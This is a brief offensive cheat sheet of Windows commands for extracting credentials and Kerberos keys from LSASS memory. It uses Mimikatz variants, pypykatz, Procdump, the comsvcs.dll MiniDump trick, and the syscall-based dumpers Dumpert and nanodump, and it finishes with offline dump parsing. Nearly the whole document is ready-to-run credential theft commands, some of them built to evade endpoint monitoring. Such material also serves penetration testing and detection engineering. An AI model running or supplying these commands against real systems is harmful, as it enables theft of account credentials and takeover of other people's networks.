% Credential Extraction from LSASS

# Extract Kerberos encryption keys from LSASS with Invoke-Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

# Extract Kerberos keys with SafetyKatz (compiled Mimikatz)
Safetykatz "sekurlsa::ekeys"

# Extract Kerberos keys with SharpKatz (C# Mimikatz)
SharpKatz.exe --Command ekeys

# Dump LSASS using Dumpert (direct system calls & API unhooking)
rundll32.exe <Outflank-Dumpert-dll-path>, Dump

# Dump LSASS using pypykatz (Python Mimikatz)
pypykatz.exe live lsa

# Dump LSASS using comsvcs.dll MiniDump (uses built‑in Windows DLL)
tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass-process-id> <destination-path> full

# Dump LSASS memory using Procdump (from Sysinternals)
procdump64.exe -accepteula -ma lsass.exe <destination-path>\lsass.dmp

# Dump LSASS using nanodump (Outflank's nanodump, uses direct syscalls)
nanodump.exe --write <destination-path>\lsass.dmp

# Parse an LSASS dump offline to extract credentials using pypykatz
pypykatz.exe lsa minidump <path-to-lsass-dump>
